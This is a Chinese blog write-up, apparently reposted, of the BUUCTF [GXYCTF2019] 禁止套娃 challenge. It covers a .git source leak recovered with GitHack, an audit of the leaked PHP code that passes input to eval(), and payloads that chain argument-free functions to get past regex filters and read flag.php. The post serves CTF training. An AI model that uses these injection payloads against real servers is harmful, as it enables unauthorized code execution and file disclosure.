BUUCTF-WEB-[GXYCTF2019]禁止套娃

.git源码泄露+代码审计

转载大佬的WP
https://blog.csdn.net/weixin_43952190/article/details/107061554

1.打开网址只显示了flag在哪,查看源代码无任何有用信息
2.用御剑也没搜索到后台目录
3.这时候考虑源码泄露
打开网址
http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git
出现403错误

403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。

猜测也许是.git源码泄露,这时候就要用到GitHack.py
在这里插入图片描述
得到index.php源码,打开

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

ok,一步一步分析:

  • 设置参数exp
  • 过滤data,filter,php,phar伪协议

引用一下大佬的伪协议总结
https://blog.csdn.net/nzjdsds/article/details/82461043

  • if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))在得到的exp参数中匹配 [a-z,_]+((?R)?) 并转化为空,注意这里有(?R)?递归调用限制我们传入的参数只能是无参数函数或者是套函数,就是说假如我们传入参数为 exp=system('ls');则匹配不成功,
    假如我们传入exp=print_r(scandir(pos(localeconv())));因为匹配成功所以函数localeconv(),pos(),scandir(),print_r()用NULL替换后为从而可以进入if从句。

(?R)?递归用法:
字符串 :abc123dsf654wre485wer652
传统作法:\w{3}\d{3}\w{3}\d{3}\w{3}\d{3}\w{3}\d{3}
递归做法:(\w{3}\d{3}|(?R))*

  • 最后一个if从句过滤了et|na|info|dec|bin|hex|oct|pi|log

函数扩展:
scandir(’.’):扫描当前目录
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
pos(),current():返回数组第一个值

构造payload:

exp=print_r(scandir(pos(localeconv())));

把pos换成current也可以


数组操作函数:

end():数组指针指向最后一位
next(): 数组指针指向下一位
array_reverse(): 将数组颠倒
array_rand(): 随机返回数组的键名
array_flip():交换数组的键和值

读取文件函数

    file_get_content() :因为et被ban,所以不能使用
    readfile()
    highlight_file()
    show_source()

构造payload:

exp=show_source(next(array_reverse(scandir(pos(localeconv())))));//反转数组顺序读取第二个元素内容(这种方法只能读取第二个或倒数第二个)
exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));//随机返回数组的键名

得flag

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值